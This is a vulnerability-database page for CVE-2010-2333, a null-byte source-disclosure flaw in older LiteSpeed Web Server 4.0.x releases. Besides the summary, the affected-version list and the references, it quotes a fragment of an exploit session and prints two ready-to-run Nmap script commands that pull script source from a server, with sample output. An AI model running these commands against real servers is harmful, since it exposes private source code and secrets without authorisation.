Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
5
CVSSv2

CVE-2010-2333

Published: 18/06/2010 Updated: 13/07/2010
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 535
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Subscribe to Litespeed Web Server

Vulnerability Summary

LiteSpeed Technologies LiteSpeed Web Server 4.0.x prior to 4.0.15 allows remote malicious users to read the source code of scripts via an HTTP request with a null byte followed by a .txt file extension.

Vulnerable Product Search on Vulmon Subscribe to Product

litespeedtech litespeed web server 4.0.9

litespeedtech litespeed web server 4.0.8

litespeedtech litespeed web server 4.0.1

litespeedtech litespeed web server 4.0

litespeedtech litespeed web server 4.0.14

litespeedtech litespeed web server 4.0.7

litespeedtech litespeed web server 4.0.6

litespeedtech litespeed web server 4.0.11

litespeedtech litespeed web server 4.0.10

litespeedtech litespeed web server 4.0.3

litespeedtech litespeed web server 4.0.2

litespeedtech litespeed web server 4.0.13

litespeedtech litespeed web server 4.0.12

litespeedtech litespeed web server 4.0.5

litespeedtech litespeed web server 4.0.4

Exploits

Exploit DB: Litespeed Technologies - Web Server Remote Poison Null Byte
Litespeed Technologies Web Server Remote Poison null byte Zero-Day discovered and exploited by Kingcope in June 2010 google gives me over 9million hits Example exploit session: %nc 192168219 80 HEAD / HTTP/10 HTTP/10 200 OK Date: Sun, 13 Jun 2010 00:10:38 GMT Server: LiteSpeed <-- consider it 0wned Accept-Ranges: bytes Connection: close ...

Nmap Scripts

http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).

nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php <host>
nmap -p8088 --script http-litespeed-sourcecode-download <host>

PORT     STATE SERVICE    REASON
8088/tcp open  radan-http syn-ack
| http-litespeed-sourcecode-download.nse: /phpinfo.php source code:
| <HTML>
| <BODY>
|    <?php phpinfo() ?>
| </BODY>
|_</HTML>
http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).

nmap -p80 --script http-litespeed-sourcecode-download --script-args http-litespeed-sourcecode-download.uri=/phpinfo.php <host>
nmap -p8088 --script http-litespeed-sourcecode-download <host>

PORT     STATE SERVICE    REASON
8088/tcp open  radan-http syn-ack
| http-litespeed-sourcecode-download.nse: /phpinfo.php source code:
| <HTML>
| <BODY>
|    <?php phpinfo() ?>
| </BODY>
|_</HTML>

References

CWE-200http://www.exploit-db.com/exploits/13850http://secunia.com/advisories/40128http://seclists.org/fulldisclosure/2010/Jun/288http://www.litespeedtech.com/support/forum/showthread.php?t=4078http://osvdb.org/65476http://www.litespeedtech.com/latest/litespeed-web-server-4.0.15-released.htmlhttp://www.securityfocus.com/bid/40815https://nvd.nist.govhttps://www.exploit-db.com/exploits/13850/https://nmap.org/nsedoc/scripts/http-litespeed-sourcecode-download.html
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
SSTICVE-2024-35863CVE-2024-35910man-in-the-middleCVE-2024-35912CVE-2024-25742LFICVE-2024-32002CVE-2024-22120
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook